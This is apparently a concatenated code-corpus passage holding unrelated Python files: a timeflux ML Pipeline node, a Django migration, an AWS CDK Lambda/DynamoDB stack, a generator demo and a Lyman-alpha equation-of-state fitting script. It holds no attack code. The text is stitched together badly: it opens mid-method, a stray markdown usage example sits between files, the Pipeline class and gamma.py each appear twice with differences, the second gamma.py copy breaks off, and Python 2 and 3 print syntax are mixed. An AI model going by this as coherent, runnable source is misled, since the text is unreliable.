if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if not self.fit and self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X is None:
self._X = []
if self._y is None and label is not None:
self._y = []
if self._X_meta is None:
self._X_meta = []
self._X.append(data)
self._X_indices.append(indices)
self._X_meta.append(meta)
if label is not None:
self._y.append(label)
def _send(self):
# Passthrough
if self._status < READY and self.passthrough:
inputs = []
for _, suffix, port in self.iterate("i*"):
if not suffix.startswith("_training") and not suffix.startswith(
"_events"
):
inputs.append((suffix, port))
for suffix, src_port in inputs:
dst_port = getattr(self, "o" + suffix)
dst_port.data = src_port.data
dst_port.meta = src_port.meta
# Model
if self._out is not None:
if "predict" in self.mode:
# Send events
if len(self._X_indices) == len(self._out):
# TODO: skip JSON serialization?
data = [
[self.mode, json.dumps({"result": self._np_to_native(result)})]
for result in self._out
]
times = (
self._X_indices
if self._dimensions == 2
else np.asarray(self._X_indices)[:, 0]
) # Keep the first timestamp of each epoch
names = ["label", "data"]
meta = (
self._X_meta
if self._dimensions == 2
else {"epochs": self._X_meta}
) # port.meta should always be an object
self.o_events.set(data, times, names, meta)
else:
self.logger.warning(
"Number of predictions inconsistent with input length"
)
else:
# Send data
if self._dimensions == 2:
try:
self.o.data = self._reindex(
self._out, self._X_indices, self._X_columns
)
self.o.meta = self._X_meta
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
if self._dimensions == 3:
if len(self._X_indices) == len(self._out):
for i, (data, times) in enumerate(
zip(self._out, self._X_indices)
):
try:
getattr(self, "o_" + str(i)).data = self._reindex(
data, times, self._X_columns
)
getattr(self, "o_" + str(i)).meta = self._X_meta[i]
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
else:
self.logger.warning(
"Number of transforms inconsistent with number of epochs"
)
def _np_to_native(self, data):
"""Convert numpy scalars and objects to native types."""
return getattr(data, "tolist", lambda: data)()
def _reindex(self, data, times, columns):
if len(data) != len(times):
if self.resample:
# Resample at a specific frequency
kwargs = {"periods": len(data)}
if self.resample_rate is None:
kwargs["freq"] = pd.infer_freq(times)
kwargs["freq"] = pd.tseries.frequencies.to_offset(kwargs["freq"])
else:
kwargs["freq"] = pd.DateOffset(seconds=1 / self.resample_rate)
if self.resample_direction == "right":
kwargs["start"] = times[0]
elif self.resample_direction == "left":
kwargs["end"] = times[-1]
else:
def middle(a):
return int(np.ceil(len(a) / 2)) - 1
kwargs["start"] = times[middle(times)] - (
middle(data) * kwargs["freq"]
)
times = pd.date_range(**kwargs)
else:
# Linearly arange between first and last
times = pd.date_range(start=times[0], end=times[-1], periods=len(data))
return pd.DataFrame(data, times, columns)
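For reference, here is a `steps` value that satisfies the schema `_make_pipeline` validates above; the scikit-learn estimators are standard, but this particular choice of steps is illustrative only.

```python
# Example steps config accepted by _make_pipeline (illustrative choice).
steps = [
    {"module": "sklearn.preprocessing", "class": "StandardScaler"},
    {"module": "sklearn.linear_model", "class": "LogisticRegression",
     "args": {"C": 1.0}},
]
node = Pipeline(steps=steps, mode="predict", event_start_training="training_starts")
```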
| """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
class Pipeline(Node):
"""Fit, transform and predict.
Training on continuous data is always unsupervised.
Training on epoched data can either be supervised or unsupervised.
If fit is `False`, input events are ignored, and initital training is not performed.
Automatically set to False if mode is either 'fit_predict' or fit_transform'.
Automatically set to True if mode is either 'predict', 'predict_proba' or 'predict_log_proba'.
Attributes:
i (Port): Continuous data input, expects DataFrame.
i_* (Port): Epoched data input, expects DataFrame.
i_training (Port): Continuous training data input, expects DataFrame.
i_training_* (Port): Epoched training data input, expects DataFrame.
i_events (Port): Event input, expects DataFrame.
o (Port): Continuous data output, provides DataFrame.
o_* (Port): Epoched data output, provides DataFrame.
o_events (Port): Event output, provides DataFrame.
Args:
steps (dict): Pipeline steps and settings
fit (bool):
mode ('predict'|'predict_proba'|'predict_log_proba'|'transform'|'fit_predict'|'fit_transform'):
meta_label (str|tuple|None):
event_start_accumulation (str):
event_stop_accumulation (str):
event_start_training (str):
event_reset (str):
buffer_size (str):
passthrough (bool):
resample (bool):
resample_direction ('right'|'left'|'both'):
resample_rate (None|float):
model: Load a pickle model - NOT IMPLEMENTED
cv: Cross-validation - NOT IMPLEMENTED
"""
def __init__(
self,
steps,
fit=True,
mode="predict",
meta_label=("epoch", "context", "target"),
event_start_accumulation="accumulation_starts",
event_stop_accumulation="accumulation_stops",
event_start_training="training_starts",
event_reset=None,
buffer_size="5s",
passthrough=False,
resample=False,
resample_direction="right",
resample_rate=None,
model=None,
cv=None,
use_task = True,
):
# TODO: validation
# TODO: model loading from file
# TODO: cross-validation
# TODO: provide more context for errors
self.fit = fit
self.mode = mode
self.meta_label = meta_label
self.event_start_accumulation = event_start_accumulation
self.event_stop_accumulation = event_stop_accumulation
self.event_start_training = event_start_training
self.event_reset = event_reset
self.passthrough = passthrough
self.resample = resample
self.resample_direction = resample_direction
self.resample_rate = resample_rate
self.use_task = use_task
self._buffer_size = pd.Timedelta(buffer_size)
self._make_pipeline(steps)
self._reset()
def update(self):
# Let's get ready
self._clear()
# Reset
if self.event_reset:
matches = match_events(self.i_events, self.event_reset)
if matches is not None:
self.logger.debug("Reset")
if self._task is not None:
if self._status == FITTING:
self._task.stop()
self._reset()
# Are we dealing with continuous data or epochs?
if self._dimensions is None:
port_name = "i_training" if self.fit else "i"
if getattr(self, port_name).ready():
self._dimensions = 2
elif len(list(self.iterate(port_name + "_*"))) > 0:
self._dimensions = 3
# Set the accumulation boundaries
if self._accumulation_start is None:
matches = match_events(self.i_events, self.event_start_accumulation)
if matches is not None:
self._accumulation_start = matches.index.values[0]
self._status = ACCUMULATING
self.logger.debug("Start accumulation")
if self._accumulation_stop is None:
matches = match_events(self.i_events, self.event_stop_accumulation)
if matches is not None:
self._accumulation_stop = matches.index.values[0]
self.logger.debug("Stop accumulation")
# Always buffer a few seconds, in case the start event is coming late
if self._status == IDLE:
start = (now() - self._buffer_size).to_datetime64()
stop = max_time()
self._accumulate(start, stop)
# Accumulate between boundaries
if self._status == ACCUMULATING:
start = self._accumulation_start
stop = self._accumulation_stop if self._accumulation_stop else max_time()
self._accumulate(start, stop)
# Should we start fitting the model?
if self._status < FITTING:
if match_events(self.i_events, self.event_start_training) is not None:
self._status = FITTING
self.logger.debug("Start training")
if self.use_task:
self._task = Task(
self._pipeline, "fit", self._X_train, self._y_train
).start()
else:
try:
self._pipeline = self._pipeline.fit(self._X_train, self._y_train)
self._fitted_success = True
except Exception as error:
self._fitted_success = False
# Is the model ready?
if self._status == FITTING:
ready_to_proceed = False
if self.use_task:
status = self._task.status()
if status:
ready_to_proceed = True
else:
ready_to_proceed = True
if ready_to_proceed:
if self.use_task:
success = status["success"]
else:
success = self._fitted_success
if success:
if self.use_task:
self._pipeline = status["instance"]
self.logger.debug(f"Model fitted in {status['time']} seconds")
else:
self.logger.debug(f"Model fitted")
self._status = READY
# TODO: this can potentially be overwritten in _send()
self.o_events.data = make_event("ready")
else:
if self.use_task:
self.logger.error(
f"An error occured while fitting: {status['exception'].args[0]}"
)
self.logger.debug(
"\nTraceback (most recent call last):\n"
+ "".join(status["traceback"])
)
else:
self.logger.error(
f"An error occured while fitting"
)
raise WorkerInterrupt()
# Run the pipeline
if self._status == READY:
self._receive()
if self._X is not None:
args = [self._X]
if self.mode.startswith("fit"):
args.append(self._y)
# TODO: optionally loop through epochs instead of sending them all at once
self._out = getattr(self._pipeline, self.mode)(*args)
# Set output streams
self._send()
def terminate(self):
# Kill the fit subprocess
if self._task is not None:
self._task.stop()
def _reset(self):
self._X_train = None
self._y_train = None
self._X_train_indices = np.array([], dtype=np.datetime64)
self._accumulation_start = None
self._accumulation_stop = None
self._dimensions = None
self._shape = ()
self._task = None
if self.mode.startswith("fit"):
self.fit = False
elif self.mode.startswith("predict"):
self.fit = True
if self.fit:
self._status = IDLE
else:
self._status = READY
def _clear(self):
self._X = None
self._y = None
self._X_indices = []
self._X_columns = []
self._X_meta = None
self._out = None
def _make_pipeline(self, steps):
schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"module": {"type": "string"},
"class": {"type": "string"},
"args": {"type": "object"},
},
"required": ["module", "class"],
},
}
try:
validate(instance=steps, schema=schema)
except Exception as error:
raise ValidationError("steps", error.message)
pipeline = []
for step in steps:
try:
args = step["args"] if "args" in step else {}
m = importlib.import_module(step["module"])
c = getattr(m, step["class"])
i = c(**args)
pipeline.append(i)
except ImportError as error:
raise ValidationError("steps", f"could not import '{step['module']}'")
except AttributeError as error:
raise ValidationError(
"steps", f"could not find class '{step['class']}'"
)
except TypeError as error:
raise ValidationError(
"steps",
f"could not instantiate class '{step['class']}' with the given params",
)
# TODO: memory and verbose args
self._pipeline = make_pipeline(*pipeline, memory=None, verbose=False)
def _accumulate(self, start, stop):
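        """Append training samples with timestamps in [start, stop) to the buffers, then trim anything outside that window."""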
# Do nothing if no fitting required
if not self.fit:
return
# Set defaults
indices = np.array([], dtype=np.datetime64)
# Accumulate continuous data
if self._dimensions == 2:
if self.i_training.ready():
data = self.i_training.data
mask = (data.index >= start) & (data.index < stop)
data = data[mask]
if not data.empty:
if self._X_train is None:
self._X_train = data.values
self._shape = self._X_train.shape[1]
indices = data.index.values
else:
if data.shape[1] == self._shape:
self._X_train = np.vstack((self._X_train, data.values))
indices = data.index.values
else:
self.logger.warning("Invalid shape")
# Accumulate epoched data
if self._dimensions == 3:
for _, _, port in self.iterate("i_training_*"):
if port.ready():
index = port.data.index.values[0]
if index >= start and index < stop:
data = port.data.values
label = get_meta(port, self.meta_label)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X_train is None:
self._X_train = np.array([data])
self._shape = self._X_train.shape[1:]
else:
self._X_train = np.vstack((self._X_train, [data]))
indices = np.append(indices, index)
if label is not None:
if self._y_train is None:
self._y_train = np.array([label])
else:
self._y_train = np.append(self._y_train, [label])
# Store indices
if indices.size != 0:
self._X_train_indices = np.append(self._X_train_indices, indices)
# Trim
if self._X_train is not None:
mask = (self._X_train_indices >= start) & (self._X_train_indices < stop)
self._X_train = self._X_train[mask]
self._X_train_indices = self._X_train_indices[mask]
if self._y_train is not None:
self._y_train = self._y_train[mask]
def _receive(self):
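        """Copy pending input data (continuous or epoched) into self._X / self._y for the next pipeline call."""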
# Continuous data
if self._dimensions == 2:
if self.i.ready():
if not self._X_columns:
self._X_columns = list(self.i.data.columns)
if self._shape and (self.i.data.shape[1] != self._shape):
self.logger.warning("Invalid shape")
else:
self._X = self.i.data.values
self._X_indices = self.i.data.index.values
self._X_meta = self.i.meta
# Epochs
if self._dimensions == 3:
for name, _, port in self.iterate("i_*"):
if port.ready() and "training" not in name and "events" not in name:
data = port.data.values
meta = port.meta
indices = port.data.index.values
label = get_meta(port, self.meta_label)
if not self._X_columns:
self._X_columns = list(port.data.columns)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if not self.fit and self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X is None:
self._X = []
if self._y is None and label is not None:
self._y = []
if self._X_meta is None:
self._X_meta = []
self._X.append(data)
self._X_indices.append(indices)
self._X_meta.append(meta)
if label is not None:
self._y.append(label)
def _send(self):
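        """Forward inputs unchanged while the model is not ready (passthrough); otherwise publish predictions as events or transformed data."""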
# Passthrough
if self._status < READY and self.passthrough:
inputs = []
for _, suffix, port in self.iterate("i*"):
if not suffix.startswith("_training") and not suffix.startswith(
"_events"
):
inputs.append((suffix, port))
for suffix, src_port in inputs:
dst_port = getattr(self, "o" + suffix)
dst_port.data = src_port.data
dst_port.meta = src_port.meta
# Model
if self._out is not None:
if "predict" in self.mode:
# Send events
if len(self._X_indices) == len(self._out):
# TODO: skip JSON serialization?
data = [
[self.mode, json.dumps({"result": self._np_to_native(result)})]
for result in self._out
]
times = (
self._X_indices
if self._dimensions == 2
else np.asarray(self._X_indices)[:, 0]
) # Keep the first timestamp of each epoch
names = ["label", "data"]
meta = (
self._X_meta
if self._dimensions == 2
else {"epochs": self._X_meta}
) # port.meta should always be an object
self.o_events.set(data, times, names, meta)
else:
self.logger.warning(
"Number of predictions inconsistent with input length"
)
else:
# Send data
if self._dimensions == 2:
try:
self.o.data = self._reindex(
self._out, self._X_indices, self._X_columns
)
self.o.meta = self._X_meta
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
if self._dimensions == 3:
if len(self._X_indices) == len(self._out):
for i, (data, times) in enumerate(
zip(self._out, self._X_indices)
):
try:
getattr(self, "o_" + str(i)).data = self._reindex(
data, times, self._X_columns
)
getattr(self, "o_" + str(i)).meta = self._X_meta[i]
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
else:
self.logger.warning(
"Number of transforms inconsistent with number of epochs"
)
def _np_to_native(self, data):
"""Convert numpy scalars and objects to native types."""
return getattr(data, "tolist", lambda: data)()
def _reindex(self, data, times, columns):
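        """Wrap data in a DataFrame; if the pipeline changed the sample count, rebuild the timestamps by resampling or by spacing them linearly."""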
if len(data) != len(times):
if self.resample:
# Resample at a specific frequency
kwargs = {"periods": len(data)}
if self.resample_rate is None:
kwargs["freq"] = pd.infer_freq(times)
kwargs["freq"] = pd.tseries.frequencies.to_offset(kwargs["freq"])
else:
kwargs["freq"] = pd.DateOffset(seconds=1 / self.resample_rate)
if self.resample_direction == "right":
kwargs["start"] = times[0]
elif self.resample_direction == "left":
kwargs["end"] = times[-1]
else:
def middle(a):
return int(np.ceil(len(a) / 2)) - 1
kwargs["start"] = times[middle(times)] - (
middle(data) * kwargs["freq"]
)
times = pd.date_range(**kwargs)
else:
                # Linearly space timestamps between the first and the last
times = pd.date_range(start=times[0], end=times[-1], periods=len(data))
return pd.DataFrame(data, times, columns)
cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 0 | 10310 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 15:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('content', '0002_auto_20170122_1509'),
('cms', '0005_auto_20170122_1534'),
]
operations = [
migrations.AddField(
model_name='paginahome',
name='posts1_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_titulo', to='content.TitleContent'),
),
]
1-lab-lambdaDynamoDB/source/cdk/app.py | donnieprakoso/workshop-buildingRESTAPIwithAWS | 23 | 10311 |
#!/usr/bin/env python3
from aws_cdk import aws_iam as _iam
from aws_cdk import aws_lambda as _lambda
from aws_cdk import aws_dynamodb as _ddb
from aws_cdk import core
class CdkStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, stack_prefix:str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Model all required resources
ddb_table = _ddb.Table(
self,
id='{}-data'.format(stack_prefix),
table_name='{}-data'.format(stack_prefix),
partition_key=_ddb.Attribute(name='ID',
type=_ddb.AttributeType.STRING),
removal_policy=core.RemovalPolicy.DESTROY, # THIS IS NOT RECOMMENDED FOR PRODUCTION USE
read_capacity=1,
write_capacity=1)
## IAM Roles
lambda_role = _iam.Role(
self,
id='{}-lambda-role'.format(stack_prefix),
assumed_by=_iam.ServicePrincipal('lambda.amazonaws.com'))
cw_policy_statement = _iam.PolicyStatement(effect=_iam.Effect.ALLOW)
cw_policy_statement.add_actions("logs:CreateLogGroup")
cw_policy_statement.add_actions("logs:CreateLogStream")
cw_policy_statement.add_actions("logs:PutLogEvents")
cw_policy_statement.add_actions("logs:DescribeLogStreams")
cw_policy_statement.add_resources("*")
lambda_role.add_to_policy(cw_policy_statement)
# Add role for DynamoDB
dynamodb_policy_statement = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW)
dynamodb_policy_statement.add_actions("dynamodb:PutItem")
dynamodb_policy_statement.add_actions("dynamodb:GetItem")
dynamodb_policy_statement.add_actions("dynamodb:Scan")
dynamodb_policy_statement.add_actions("dynamodb:Query")
dynamodb_policy_statement.add_actions("dynamodb:ConditionCheckItem")
dynamodb_policy_statement.add_resources(ddb_table.table_arn)
lambda_role.add_to_policy(dynamodb_policy_statement)
## AWS Lambda Functions
fnLambda_storeData = _lambda.Function(
self,
"{}-function-storeData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/store-data"),
handler="app.handler",
timeout=core.Duration.seconds(60),
role=lambda_role,
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_storeData.add_environment("TABLE_NAME", ddb_table.table_name)
fnLambda_listData = _lambda.Function(
self,
"{}-function-getData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/list-data"),
handler="app.handler",
role=lambda_role,
timeout=core.Duration.seconds(60),
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_listData.add_environment("TABLE_NAME", ddb_table.table_name)
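        # Export the DynamoDB table and Lambda function names as CloudFormation outputs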
core.CfnOutput(self, "{}-output-dynamodbTable".format(stack_prefix), value=ddb_table.table_name, export_name="{}-ddbTable".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaStoreData".format(stack_prefix), value=fnLambda_storeData.function_name, export_name="{}-lambdaStoreDataName".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaListData".format(stack_prefix), value=fnLambda_listData.function_name, export_name="{}-lambdaListDataName".format(stack_prefix))
stack_prefix='restAPI-lab1-lambdaDynamoDB'
app = core.App()
stack = CdkStack(app, stack_prefix, stack_prefix=stack_prefix)
core.Tags.of(stack).add('Name',stack_prefix)
app.synth()
module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 0 | 10312 |
students = []
def read_file():
    try:
        # Context manager closes the file even if reading fails partway through
        with open("students.txt", "r") as f:
            for student in read_students(f):
                students.append(student)
    except Exception:
        print("Could not read file")
def read_students(f):
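    """Generator: yields the file's lines one at a time instead of reading them all at once."""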
for line in f:
yield line
read_file()
print(students)
paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | 0 | 10313 | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from <NAME>'s IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
    print('Reading file from:', fname)
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
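    # a is the intercept log10(T0) and b the slope (gamma - 1); amet/bmet repeat the fit for the log10 carbon abundance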
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
return (redshift,10.0**a, b+1)
| """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from <NAME>'s IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
